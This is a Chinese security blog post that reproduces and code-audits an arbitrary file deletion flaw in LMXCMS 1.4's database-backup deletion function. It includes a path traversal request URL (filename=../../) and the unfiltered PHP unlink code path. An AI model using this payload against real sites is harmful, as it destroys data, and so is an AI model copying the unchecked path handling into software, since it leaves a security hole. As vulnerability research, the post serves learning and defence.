代码审计-梦想cms-任意文件删除

已于 2022-03-02 09:51:39 修改
阅读量390 收藏 2
点赞数
文章标签: 安全 web安全
于 2021-10-26 12:06:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_47604261/article/details/120969178
版权

代码审计-梦想cms-任意文件删除

参考资料(含下载链接)
原作者 https://www.freebuf.com/vuls/254825.html

复现

1.找到要删除的文件
在这里插入图片描述

2.漏洞url
http://192.168.0.116/lmxcms1.4/admin.php?m=backdb&a=delbackdb&filename=

3.删除文件
http://192.168.0.116/lmxcms1.4/admin.php?m=backdb&a=delbackdb&filename=…/…/1.txt
在这里插入图片描述
不能删除中文名的文件,url 编码也不要好使(我也不知道为什么)
代码审计

传参代码

    public function delbackdb(){
        // 接收filename GET参数
        $filename = trim($_GET['filename']);
        //判断值真假
        if(!$filename){
            //如果没有
            rewrite::js_back('备份文件不存在');
        }
        //进入delOne
        $this->delOne($filename);
        addlog('删除数据库备份文件');
        rewrite::succ('删除成功');
    }

delOne 内

这里路径并没有进行过滤检测通过…/…/ 可以进行翻越路径 。进入unlink

    private function delOne($filename){
    	// >../../<进行翻越
        $dir = ROOT_PATH.'file/back/'.$filename;
        file::unLink($dir);
    }
}

传入unlink 执行

    public static function unLink($path){
        if($path == ROOT_PATH) return;
        if(is_file($path)){
        	//删除文件
            if(!@unlink($path)) rewrite::js_back('删除文件失败,请检查'.$path.'文件权限');
            return true;
        }
    }
果汁天下苏
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
代码审计--CatfishCMS文件上传漏洞
Nginxx的博客
12-07 482
声明:本公众号大部分文章来黑白之间安全团队成员的实战经验以及学习积累,文章内公布的漏洞或者脚本都来自互联网,未经授权,严禁转载。 请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本团队无关。 前言 逛 cnvd 的时候看到 catfish cms文件上传漏洞,于是审了审,就发现了这两处文件上传,具体是不是该漏洞,还有待考证。 CNVD编号 CNVD-2021-42363 影响范围 文中标的是 Catfish CMS V5.9.6 ,但这里这个我看了下,最新能下载到的 v5.9.
代码审计-审计方法和思路+文件对比技术
xiaoheizi的博客
08-06 378
查看cms官网更新情况,可以看到漏洞版本后又更新了一个版本,就可以下载漏洞版本和更新版本进行对比。在cnvd等漏洞信息共享平台经常会发布一些某某cms爆出了某某漏洞,但是就是不公开漏洞具体信息。只爆出了产生漏洞的版本信息,并没有漏洞具体产生位置。访问地址,传递参数为1。我们就可以使用存在漏洞的版本和更新的版本进行对比,因为更新的目的就是解决之前的问题。审计目标的程序名,版本,当前环境(系统,中间件,脚本语言等信息),各种插件等。审计项目漏洞原理->审计思路->完整源码->应用框架->验证并利用漏洞。
代码审计之_lmxcms1.4漏洞
whojoe的博客
04-12 3473
lmxcms1.4代码审计及漏洞复现lmxcms1.4代码审计及漏洞复现1.存在漏洞2.漏洞利用2.1.前台sql注入2.2后台任意文件删除2.3后台任意文件上传3.漏洞分析3.1前台sql注入3.2后台任意文件删除4.利用链 lmxcms1.4代码审计及漏洞复现 1.存在漏洞 前台sql注入,后台任意文件删除任意文件上传 2.漏洞利用 2.1.前台sql注入 GET http://192.16...
梦想cms(lmxcms)网站管理系统 v1.1
04-04
梦想cms以下简称“lmxcms”,是由“10年”(网名)开发的一套简单实用的网站管理系统(cms),完全免费开源,无授权限制,你可以用本系统在任何地方使用而不用花费任何费用。 lmxcms基于php语言和mysql数据库开发,系统采用业界流行的MVC设计模式开发,使得系统结构更加清晰明了,便于进行二次开发和管理,并且lmxcms内嵌了smarty模板引擎,使程序与模板分离,如果您足够了解lmxcms完全可以自定义模板标签。 lmxcms主要包括以下功能: 自定义模型:可以完全自由的根据网站需要添加修改所需字段。系统安装默认自带新闻模型和产品模型。 纯静态html生成:支持纯静态html生成,不仅可以减少数据库请求,加快页面载入速度,也更加适合搜索引擎优化(SEO)。 自定义表单:可以自由创建表单字段,每个表单可以自由组合表单所需要字段。 站内搜索:自由组合搜索条件,包括按照模型、栏目、字段、搜索模板、时间范围等,并且支持搜索关键字记录。 友情链接:支持文字和图片形式的友情链接。 广告系统:后台支持文字、图片、html三种形式的广告系统。 在线留言:支持自定义开启和关闭留言板,留言板页面支持调用留言数据。 焦点图系统:后台可以创建焦点图片,并且系统默认了5种样式的焦点图。 数据备份:后台可以备份和恢复数据库,并且可以自由下载数据库到本地。 模板管理:后台支持自定义切换模板风格,支持在线编辑模板(需要修改配置文件)。 文件管理:系统内嵌了swfupload上传插件,可以在文件管理里面来管理后台上传的各种图片、文件、附件等。 扩展变量:支持自定义扩展变量,可以在模板任意处输出该变量内容。 日志操作:后台的每一个操作都会记录到日志操作中,有需要时查看。 lmxcms v1.1更新如下: 功能增加: “article”标签调用数据,可以自定义返回变量名。 增加错误404页面,在根目录下自己编辑页面即可。 更新留言板同一ip一定时间范围内最大留言条数。 增加自定义开启搜索功能,在config.inc.php配置文件中设置。 bug修复 后台卡死修复。 后台切换模板没有清除缓存修复。
PHP代码审计——任意文件删除漏洞(YXcms
W小哥
08-20 1053
一、代码审计 删除文件的代码在del()方法,首先通过GET方式接收参数fname传递过来的的值,然后执行in()函数 跟踪in()函数,发现in函数接收过来的值分为两种情况:字符串、数组。对删除文件没有任何防止,可以不用管 htmlspecialchars():— 将特殊字符转换为 HTML 实体 trim():— 去除字符串首尾处的空白字符(或者其他字符) 返回查看del()函数,其中第二行 dirs=strreplace(′,′,′/′,dirs=str_replace(',','/',dirs=
梦想cms1.4审计
灰太的表格的博客
07-22 458
梦想cms1.4审计 一个简单的mvc,直接去看配置文件和控制器,配置文件中无waf: 先来后台的,后台的都比较容易 sql注入1 BookAction.class.php文件: 有传参,跟进下getReply方法: 进行了字符串拼接操作,并且返回调用了父类的selectModel方法,跟进下: 又调用了父类的selectDB方法,跟进下: 进行了sql查询并且我们可以控制 $sqlStr变量,打印下sql语句: 闭合构造下payload: ...
梦想v1.4 CMS平台XSS与代码审计分析
anlalu233的博客
03-05 439
https://www.freebuf.com/vuls/218838.html
梦想cms1.4代码审计
m0_60716947的博客
01-07 1939
php代码审计梦想cms
74CMS_4.2.3_任意文件读取_CNVD-2017-26183
02-22
本文为 漏洞编号CNVD-2017-26183 ,即 74CMS 任意文件读取漏洞利用工具源码内容 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 更多...
代码审计】xyhcms3.5后台任意文件读取1
08-03
代码审计】xyhcms3.5 后台任意文件读取漏洞详解 在网络安全领域,代码审计是一项至关重要的工作,它能帮助开发者发现并修复潜在的安全问题。本文将深入探讨xyhcms3.5中一个特定的任意文件读取漏洞,该问题存在于...
梦想cms(lmxcms) 1.4.rar
05-25
梦想cms(lmxcms)使用php语言和mysql数据库开发,并且采用了主流的MVC设计模式,使系统框架结构清晰、易维护、模块化、扩展性更好,而且系统中内置smarty模 板引擎,模板标签扩展更加自由。 梦想cms(lmxcms) 1.4 升级日志: 更新功能包括:增加采集功能,采集功能非常强大,绝对可比拟市面上的任何cms的采集功能增加上传图片生成缩略图可以根据宽度自动缩放高度比例增加tags可以绑定栏目增加随机信息调用标签 randdata 使用方法看手册增加随机调用tags标签 randtags 使用方法看手册后台去除嵌入广告修复bug:数据库恢复(注意:请在升级完成后重新备份数据库,避免以前备份过的无法恢复)搜索时间间隔参数无效的bug修复执行sql语句由于表前缀导致的错误相关链接标签链接有误的bug
梦想cms(lmxcms)网站管理系统 v1.3
04-04
lmxcms基于php语言和mysql数据库开发,系统采用业界流行的MVC设计模式开发,使得系统结构更加清晰明了,便于进行二次开发和管理,并且lmxcms内嵌了smarty模板引擎,使程序与模板分离,如果您足够了解lmxcms完全可以自定义模板标签。 lmxcms主要包括以下功能: 自定义模型:可以完全自由的根据网站需要添加修改所需字段。系统安装默认自带新闻模型和产品模型。 纯静态html生成:支持纯静态html生成,不仅可以减少数据库请求,加快页面载入速度,也更加适合搜索引擎优化(SEO)。 自定义表单:可以自由创建表单字段,每个表单可以自由组合表单所需要字段。 站内搜索:自由组合搜索条件,包括按照模型、栏目、字段、搜索模板、时间范围等,并且支持搜索关键字记录。 友情链接:支持文字和图片形式的友情链接。 广告系统:后台支持文字、图片、html三种形式的广告系统。 在线留言:支持自定义开启和关闭留言板,留言板页面支持调用留言数据。 焦点图系统:后台可以创建焦点图片,并且系统默认了5种样式的焦点图。 数据备份:后台可以备份和恢复数据库,并且可以自由下载数据库到本地。 模板管理:后台支持自定义切换模板风格,支持在线编辑模板(需要修改配置文件)。 文件管理:系统内嵌了swfupload上传插件,可以在文件管理里面来管理后台上传的各种图片、文件、附件等。 扩展变量:支持自定义扩展变量,可以在模板任意处输出该变量内容。 日志操作:后台的每一个操作都会记录到日志操作中,有需要时查看。 Tags功能:支持tags标签功能,增加信息可以选择或者自动创建,每个tags标签也可以定义不同的模板。 专题功能:支持自定义创建专题功能,增加信息可以选择专题,每个专题可以定义不同模板等。 自动、手动分词:增加、修改信息时,可以选择自动把正文或者标题提取为关键字功能。 提取描述:增加信息时可以选择自动提取正文中的第一段为描述信息。 lmxcms v1.3 更新日志: lmxcms1.3增加功能: 加入专题功能 加入tags标签功能 静态模式下可以使用中文路径(服务器或者空间必须支持中文文件夹),否则为拼音模式,可以在 config.inc.php中设置路径模式 加入伪静态访问模式 加入栏目绑定域名功能 需要配合域名解析 加入后台登录密码错误次数限制 加入控制后台操作日志开关 /inc/config.inc.php 参数控制 增加设置内容信息关键字和关键字链接 增加提取正文为描述信息 增加提取标题或正文为关键字 修改内容信息页面布局 lmxcms1.3修复: 修复图片上传、水印错误 修复删除图片、文件删除本地文件的错误 修复数据库备份因数据量过大导致内存溢出错误,优化数据库备份、恢复、下载功能
梦想cms(lmxcms)网站管理系统 v1.4
10-24
lmxcms基于php语言和mysql数据库开发,系统采用业界流行的MVC设计模式开发,使得系统结构更加清晰明了,便于进行二次开发和管理,并且lmxcms内嵌了smarty模板引擎,使程序与模板分离,如果您足够了解lmxcms完全可以自定义模板标签。lmxcms1.4主要包括以下功能:自定义模型:可以完全自由的根据网站需要添加修改所需字段。系统安装默认自带新闻模型和产品模型。 纯静态html生成:支持纯静态html生成,不仅可以减少数据库请求,加快页面载入速度,也更加适合搜索引擎优化(SEO)。自定义表单:可以自由创建表单字段,每个表单可以自由组合表单所需要字段。站内搜索:自由组合搜索条件,包括按照模型、栏目、字段、搜索模板、时间范围等,并且支持搜索关键字记录。友情链接:支持文字和图片形式的友情链接。广告系统:后台支持文字、图片、html三种形式的广告系统。在线留言:支持自定义开启和关闭留言板,留言板页面支持调用留言数据。焦点图系统:后台可以创建焦点图片,并且系统默认了5种样式的焦点图。数据备份:后台可以备份和恢复数据库,并且可以自由下载数据库到本地。模板管理:后台支持自定义切换模板风
梦想cms(lmxcms)网站管理系统 v1.4.rar
08-30
lmxcms基于php语言和mysql数据库开发,系统采用业界流行的MVC设计模式开发,使得系统结构更加清晰明了,便于进行二次开发和管理,并且lmxcms内嵌了smarty模板引擎,使程序与模板分离,如果您足够了解lmxcms完全可以自定义模板标签。 lmxcms1.4主要包括以下功能: 自定义模型:可以完全自由的根据网站需要添加修改所需字段。系统安装默认自带新闻模型和产品模型。 纯静态html生成:支持纯静态html生成,不仅可以减少数据库请求,加快页面载入速度,也更加适合搜索引擎优化(SEO)。 自定义表单:可以自由创建表单字段,每个表单可以自由组合表单所需要字段。 站内搜索:自由组合搜索条件,包括按照模型、栏目、字段、搜索模板、时间范围等,并且支持搜索关键字记录。 友情链接:支持文字和图片形式的友情链接。 广告系统:后台支持文字、图片、html三种形式的广告系统。 在线留言:支持自定义开启和关闭留言板,留言板页面支持调用留言数据。 焦点图系统:后台可以创建焦点图片,并且系统默认了5种样式的焦点图。 数据备份:后台可以备份和恢复数据库,并且可以自由下载数据库到本地。 模板管理:后台支持自定义切换模板风格,支持在线编辑模板(需要修改配置文件)。 文件管理:系统内嵌了swfupload上传插件,可以在文件管理里面来管理后台上传的各种图片、文件、附件等。 扩展变量:支持自定义扩展变量,可以在模板任意处输出该变量内容。 **志操作:后台的每一个操作都会记录到**志操作中,有需要时查看。 Tags功能:支持tags标签功能,增加信息可以选择或者自动创建,每个tags标签也可以定义不同的模板。 采集系统:支持图片远程保存,图片的各种处理等。 专题功能:支持自定义创建专题功能,增加信息可以选择专题,每个专题可以定义不同模板等。 自动、手动分词:增加、修改信息时,可以选择自动把正文或者标题提取为关键字功能。 提取描述:增加信息时可以选择自动提取正文中的第一段为描述信息。 lmxcms1.4更新内容包括: 增加功能: 增加采集功能,采集功能非常强大,绝对可比拟市面上的任何cms的采集功能 增加上传图片生成缩略图可以根据宽度自动缩放高度比例 增加tags可以绑定栏目 增加随机信息调用标签 randdata 使用方法看手册 增加随机调用tags标签 randtags 使用方法看手册 后台去除嵌入广告 修复功能: 数据库恢复(注意:请在升级完成后重新备份数据库,避免以前备份过的无法恢复) 搜索时间间隔参数无效的bug 修复执行sql语句由于表前缀导致的错误 相关链接标签链接有误的bug
梦想cms(lmxcms)v1.4 网站系统.zip
07-06
lmxcms1.4更新内容包括: 增加功能: 增加采集功能,采集功能非常强大,绝对可比拟市面上的任何cms的采集功能 增加上传图片生成缩略图可以根据宽度自动缩放高度比例 增加tags可以绑定栏目 增加随机信息调用标签 randdata 使用方法看手册 增加随机调用tags标签 randtags 使用方法看手册 后台去除嵌入广告 修复功能: 数据库恢复(注意:请在升级完成后重新备份数据库,避免以前备份过的无法恢复) 搜索时间间隔参数无效的bug 修复执行sql语句由于表前缀导致的错误 相关链接标签链接有误的bug lmxcms基于php语言和mysql数据库开发,系统采用业界流行的MVC设计模式开发,使得系统结构更加清晰明了,便于进行二次开发和管理,并且lmxcms内嵌了smarty模板引擎,使程序与模板分离,如果您足够了解lmxcms完全可以自定义模板标签。 lmxcms1.4主要包括以下功能: 自定义模型:可以完全自由的根据网站需要添加修改所需字段。系统安装默认自带新闻模型和产品模型。 纯静态html生成:支持纯静态html生成,不仅可以减少数据库请求,加快页面载入速度,也更加适合搜索引擎优化(SEO)。 自定义表单:可以自由创建表单字段,每个表单可以自由组合表单所需要字段。 站内搜索:自由组合搜索条件,包括按照模型、栏目、字段、搜索模板、时间范围等,并且支持搜索关键字记录。 友情链接:支持文字和图片形式的友情链接。 广告系统:后台支持文字、图片、html三种形式的广告系统。 在线留言:支持自定义开启和关闭留言板,留言板页面支持调用留言数据。 焦点图系统:后台可以创建焦点图片,并且系统默认了5种样式的焦点图。 数据备份:后台可以备份和恢复数据库,并且可以自由下载数据库到本地。 模板管理:后台支持自定义切换模板风格,支持在线编辑模板(需要修改配置文件)。 文件管理:系统内嵌了swfupload上传插件,可以在文件管理里面来管理后台上传的各种图片、文件、附件等。 扩展变量:支持自定义扩展变量,可以在模板任意处输出该变量内容。 日志操作:后台的每一个操作都会记录到日志操作中,有需要时查看。 Tags功能:支持tags标签功能,增加信息可以选择或者自动创建,每个tags标签也可以定义不同的模板。 采集系统:支持图片远程保存,图片的各种处理等。 专题功能:支持自定义创建专题功能,增加信息可以选择专题,每个专题可以定义不同模板等。 自动、手动分词:增加、修改信息时,可以选择自动把正文或者标题提取为关键字功能。 提取描述:增加信息时可以选择自动提取正文中的第一段为描述信息。        相关阅读 同类推荐:lmxcms后台密码找回插件 企业网站源码
源代码-单文件CMS学习参考.zip
最新发布
08-24
源代码-单文件CMS学习参考.zip 源代码-单文件CMS学习参考.zip 源代码-单文件CMS学习参考.zip 源代码-单文件CMS学习参考.zip 源代码-单文件CMS学习参考.zip 源代码-单文件CMS学习参考.zip 源代码-单文件CMS学习参考....
monxin cms 任意文件删除漏洞
aihuochou9723的博客
08-05 172
\program\diypage\receive\edit.php首先看到一个unlink($path);本来应该先看sql语句的,但知道是任意文件删除先跳过删除语句,看看$path怎么传入的倒推上去1.$path=$v;2.foreach($old_imgs as $v)3.$old_imgs=get_match_all($reg,$r['content']);get_match_al...
CNVD-1day代码审计&梦想CMS1.4&updatexml报错注入
m0_63917373的博客
01-04 1151
sql报错注入 updatexml函数利用 梦想CMS 代码审计
飞飞影视导航系统后台任意文件删除
xxx9686的博客
09-26 1041
其中的delall函数存在任意文件删除漏洞,foreach($_POST['ids'] as $value)将遍历通过post获得的参数ids,然后使用@unlink(DATA_PATH.'_bak/'.$value)语句删除ids对应路径的文件。漏洞所在文件:feifei\Lib\Lib\Action\Admin\DataAction.class.php。路径:feifei\Lib\Lib\Action\Admin\DataAction.class.php。漏洞文件代码:(只贴上相关代码)
深入理解django-cms:现代Web发布平台
"django-cms是基于Django框架构建的开源内容管理系统,用于现代网页发布平台。它提供了一套开箱即用的功能,适用于常见的CMS需求,并且可由开发者进行定制和扩展,以适应特定项目需求。该系统包含了教程、实践指南和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值